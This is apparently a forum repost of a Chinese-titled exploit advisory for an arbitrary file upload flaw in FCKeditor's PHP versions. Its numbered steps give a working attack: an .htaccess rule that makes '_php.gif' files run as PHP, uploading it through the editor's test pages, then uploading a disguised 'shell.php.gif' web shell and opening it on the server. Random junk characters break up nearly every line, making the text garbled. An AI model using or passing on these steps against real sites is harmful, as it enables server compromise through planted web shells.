FCKeditor所有php版本Upload上传漏洞
% U, _7 _8 n# u" R3 W" f作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
, N4 V' s0 q0 z! a, Z减小字体 增大字体
: N- k) F/ f) J c: l/ H+ o' x3 \' M1 h) x4 Z[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability/ }# y6 A. l1 x( w
[+] Date: 2011
3 [2 T" S+ t X7 B% X) o9 f6 s$ l[+] Author : sinesafe.cn5 I" ~4 l$ ]- u {7 f* z
[+] Website : WwW.sinesafe.cn0 o* C0 s) F, K- h: Y. _
———————————————————0 ]7 p) u) M+ q) U6 n" ]; x
1.create a htaccess file:- w7 [2 d* d" }8 z) J/ W) K
code:
2 l$ S- x5 F% w3 C<FilesMatch “_php.gif”>3 t3 O/ y. p1 Y4 L- r& [( o
SetHandler application/x-httpd-php
2 i7 r- ~0 a. B0 ^1 H1 d</FilesMatch>: l6 P! g) }8 ^- C/ R0 I. K5 h
, p( y% v5 a, z" J8 W- |( ^0 o) l6 U
2.Now upload this htaccess with FCKeditor.6 q0 ]8 Z% M2 x
( E. F) u9 [2 ]. z6 M
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html% m$ `9 h2 N& }4 ]3 @: K/ }$ e
( _. r! N( |8 q( z- f- G5 yhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html5 @, i$ e, _6 m" K( n& a( b
$ t9 z- x* E; c- g2 L8 s: E5 N( a———————————————————————————————-
! A# e5 V; I" I, D3.Now upload shell.php.gif with FCKeditor.1 I! O" Q' p- x5 _! V" [" L
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
3 {: E# _, w- G1 J8 x" ~5.http://www.sinesafe.cn/anything/shell_php.gif- I+ Q% z& p' V$ z) ~. r" P# V3 R
6.Now shell is available from server. |
/ y- x9 J3 Y& a0 v9 z. ~
* z) L& \/ ~$ ], u3 J K2 [4 i! c- I2 p I* p7 q3 d
|
发表于 2013-10-27 17:25:21
收藏
支持
反对